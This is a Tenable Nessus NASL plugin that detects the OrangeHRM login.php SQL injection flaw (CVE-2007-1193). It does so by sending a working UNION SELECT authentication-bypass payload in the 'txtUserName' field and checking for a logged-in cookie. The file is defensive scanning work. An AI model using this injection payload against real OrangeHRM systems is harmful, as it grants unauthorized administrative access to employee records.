#
# (C) Tenable Network Security
#


if (description)
{
  script_id(24743);
  script_version("$Revision: 1.4 $");

  script_cve_id("CVE-2007-1193");
  script_bugtraq_id(22756);
  script_xref(name:"OSVDB", value:"35993");

  script_name(english:"OrangeHRM txtUserName SQL Injection Vulnerability");
  script_summary(english:"Tries to bypass OrangeHRM's authentication");
 
  desc = "
Synopsis :

The remote web server contains a PHP script that is affected by a SQL
injection vulnerability. 

Description :

The remote host is running OrangeHRM, a human resource management
system written in PHP. 

The version of OrangeHRM installed on the remote host fails to
sanitize input to the 'txtUserName' parameter of the 'login.php'
script before using it in a database query.  An unauthenticated remote
attacker may be able to leverage this flaw to manipulate SQL queries
and, for example, bypass authentication, uncover sensitive
information, modify data, or even launch attacks against the
underlying database. 

Note that successful exploitation of this issue requires that PHP's
'magic_quotes_gpc' be disabled. 

See also :

http://www.nessus.org/u?3e41c792

Solution :

Upgrade to OrangeHRM 2.1 alpha 5 or later. 

Risk factor : 

High / CVSS Base Score : 9.3
(CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C)";
  script_description(english:desc);
 
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/orangehrm2", "/orangehrm", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Make sure the affected script exists.
  url = string(dir, "/login.php");
  req = http_get(item:url, port:port);
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # If it does...
  if ("OrangeHRM" >< res && '<input name="txtUserName"' >< res)
  {
    # Try to exploit the flaw to bypass authentication.
    pass = SCRIPT_NAME;
    exploit = string(unixtime(), "' UNION SELECT 'admin','", hexstr(MD5(pass)), "',null,'USR001','USG001','Enabled',null,'Yes'/*");

    postdata = string(
      "actionID=chkAuthentication&",
      "txtUserName=", urlencode(str:exploit), "&",
      "txtPassword=", pass, "&",
      "Submit=Login"
    );
    req = string(
      "POST ", url, " HTTP/1.1\r\n",
      "Host: ", get_host_name(), "\r\n",
      "Content-Type: application/x-www-form-urlencoded\r\n",
      "Content-Length: ", strlen(postdata), "\r\n",
      "\r\n",
      postdata
    );
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
    if (res == NULL) exit(0);

    # There's a problem if we get a Loggedin cookie.
    if ("Loggedin=True" >< res)
    {
      security_hole(port);
      exit(0);
    }
  }
}
